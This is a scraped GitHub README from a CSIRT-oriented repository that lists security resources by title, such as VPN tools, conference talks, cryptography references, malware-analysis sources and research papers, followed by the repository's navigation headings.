AntiCheat-Testing-Framework: Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
IronPython, darkly: how we uncovered an attack on government entities in Europe
inlets: Expose your local endpoints to the Internet
Projects released by the Team intelstorm, papers
Pwnagotchi: (⌐■_■) - Deep Reinforcement Learning vs WiFI
spyse.py: Python API wrapper and command-line client for the tools hosted on spyse.com.

VPN

jigsaw project by Alphabet/Google. Outline: VPN Server.
SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
Sputnik -An Open Source Intelligence Browser Extension
PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
Nefarious LinkedIn: A look at how LinkedIn spies on its users.

General

Explain Shell
Examples of regular expressions
A tcpdump Tutorial and Primer with Examples
Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
A curated list of awesome Threat Intelligence resources
Looking for value in EV Certificates
How to find hidden cameras
the Simple Encrypted Arithmetic Library (SEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
A port of ChibiOS to the Orchard radio platform
Decent Security: Everyone can be secure.
Introducing Certificate Transparency and Nimbus
trillian: Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
CFSSL's CA trust store repository
A Few Thoughts on Cryptographic Engineering
Mailfence
Threat Hunting Workshop - Methodologies for Threat Analysis
Xoodoo
CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
AgentMaps: Make social simulations on interactive maps with Javascript!
flowsscripts: Miner pools ips.
SwiftFilter: Exchange Transport rules to detect and enable response to phishing
The Illustrated TLS Connection: Every Byte Explained
Practical Cryptography
Thieves and Geeks: Russian and Chinese Hacking Communities
ephemera-miscellany: Ephemera and other documentation associated with the 1337list project.
The New Illustrated TLS Connection
CleverHans: An adversarial example library for constructing attacks, building defenses, and benchmarking both
How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
HTTP/3 Explained - github/http2 explained - github
The Practical Guide to Hacking Bluetooth Low Energy
A Practical Guide to BLE Throughput
Exploiting IoT enabled BLE smart bulb security
security: Discussion area for security aspects of ECMAScript
Template for Data Protection Impact Assessment (DPIA)
hash collisions exploitation and other pocs, a script to collide PDFs
Shodan - A tool for Security and Market Research
Engineering Security: general book about a range of topics in security.
(ru) Плакаты по информационной безопасности Российской армии: Russian counter information posters.
Kerberos (I): How does Kerberos work? – Theory
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
Vulncode-DB project: The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
One-End Encryption (OEE): Stronger than End-to-End Encryption
Configuring MTA-STS and TLS Reporting For Your Domain
Automatic SSL with Now and Let's Encrypt
Hacking Digital Calipers
Binary Hardening in IoT products: Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
ZigDiggity: A ZigBee hacking toolkit by Bishop Fox.

Conferences and Slides

Security Guidelines for Congressional Campaigns
From Assembly to JavaScript and back (OffensiveCon2018)
Kudelski Security's 2018 pre-Black Hat crypto challenge
Black Hat 2018: Expert demonstrated a new PHP code execution attack
[DEFCON 2018] Doublethink: 8-Architecture Assembly Polyglot by Robert Xiao
ARM-based IoT Exploit Development
(pt-br)Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito
Outflank Presentations
The Art of De-obfuscation
H2HC - Hackers To Hackers Conference:
- H2HC 2017: H2HC 2017 Slides/Materials/Presentations
- H2HC 2018: Slides/Materials/Presentations
SBSeg 2018: Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)
Smartphone Privacy: How Your Smartphone Tracks Your Entire Life
Fun with LDAP and Kerberos- in AD environments
Analysis and recommendations for standardization in penetration testing and vulnerability assessment
The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
Objective by the Sea (2018):
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Bradon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikahail Sosonkin
- Aliens Among Us - Michael Lynn
BlackHoodie 2018 Workshop: An Introduction To Binary Exploitation
Malware: Anti-forensics
The 35C3 halfnarp
SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
Mojave's Sandbox is Leaky
Code Obfuscation 10**2+(2*a+3)%2
DeepState: Bringing vulnerability detection tools into the development lifecycle, paper: DeepState: Symbolic Unit Testing for C and C++
Hardware Memory Tagging to make C/C++ memory safe(r)
wallet.fail: Hacking the most popular cryptocurrency hardware wallets
Reverse Engineering: Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
Making C Less Dangerous in the Linux kernel
Modchips of the State: Hardware implants in the supply-chain - CCC 2018
Workshop-BSidesMunich2018: ARM shellcode and exploit development - BSidesMunich 2018
REhint's Publications.
INFILTRATE 2019 Demo Materials
A Practical Approach to Purple Teaming
The Advanced Threats Evolution: REsearchers Arm Race by @matrosov
The Beginner Malware Analysis Course + VirusBay Access
MISP Summit 05: MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
ConPresentations by Maddie Stone.
Venturing into the Dark- a review of Dark Side Ops 2: Adversary Simulation

Sources

Some good places to visit:

hasherezade's 1001 nights
- How to start RE/malware analysis? | hasherezade's 1001 nights
List of Helpful Information Security Multimedia
pocorgtfo: a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
FIDO ECDAA Algorithm
stamparm: Miroslav Stampar Repositories (a lot of good stuff)
Github repos:
- gabrielmachado
Damn Vulnerable Web Application:
- Damn Vulnerable Web Application Docker container
- Damn Vulnerable Web Application (DVWA)
Nelson Brito's Source: This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
(pt-br)PwnLab: init
Mamont's open FTP Index: a lot of open FTPs!!!
fuzz.txt: Potentially dangerous files
Free Training: New Certified Learning Paths: The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!

Fun

Spoilerwall introduces a brand new concept in the field of network hardening
abusing github commit history for the lulz
resist_oped: 🕵🏽‍♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House.
InfoSec BS Bingo
How to fit all of Shakespeare in one tweet (and why not to do it!)
Attrition.org: defacement rank.
rot8000: rot13 for the Unicode generation (github)
Reverse Engineering Pokémon GO Plus: TL;DR; You can clone a Pokemon GO Plus device that you own. pgpemu: github repo.
grugq quotes
Pivots & Payloads Board Game: Introducing the NEW SANS Pen Test Poster by SANS Institute
Chess Steganography
Enigma, the Bombe, and Typex
(pt-br) Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil
Enigma machine: This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
How I hacked modern Vending Machines
A better zip bomb
Goodbye-World: The last program that every developer writes.
Dumb Password Rules
Enigma I, Navy M3/M4 Machine Emulator.

CFPs

2018

Organized by security consulting and research firm Independent Security Evaluators (ISE), IoT Village delivers advocacy for and expertise on security advancements in Internet of Things devices.

Articles

[1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
[1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
The Hunt for 3ve: Taking down a major ad fraud operation through industry collaboration.
Page Cache Attacks: We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
Identification and Illustration of Insecure Direct Object References and their Countermeasures
China’s Maxim: Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking

Black Friday 2018
- Infosec/IT Black Friday/Cyber Monday 2018 - Pastebin.com
- Quantum Blockchain using entanglement in time

Name		Name	Last commit message	Last commit date
Latest commit History 324 Commits
PoCs		PoCs
windows		windows
Blockchain.md		Blockchain.md
CERT.md		CERT.md
CVEsPoCs.md		CVEsPoCs.md
LICENSE		LICENSE
News.md		News.md
PDFAnalysis.md		PDFAnalysis.md
README.md		README.md
SecurityProjects.md		SecurityProjects.md
books.md		books.md
botnets.md		botnets.md

License

pedrosa-t/csirt

Folders and files

Latest commit

History

Repository files navigation

CSIRT

Books

Links

Hashing

CVEs

Malware Analysis

Samples

Repos

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles

Reverse Engineering

Ghidra

Frameworks

Patching

Hardening

Apache

Web

Credentials

Secure Programming

Fuzzing

API

REST

CTFs

Phreak

Archs

Pentesting

Reporting

OSINT - Open Source INTelligence

Vulnerability

WAFs

Exploits

Red Team

DNS

Exfiltration

Phishing

Forensics

Blue Team

Threat Hunting

SIEM

Browsers

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

macOS/iOS

Android

Linux

Cloud

AWS

Risk Assessment

Radio

Satellite

Tools

VPN

General

Conferences and Slides

Sources

Fun

CFPs

2018

Articles

About

Resources

License

Stars

Watchers

Forks

Languages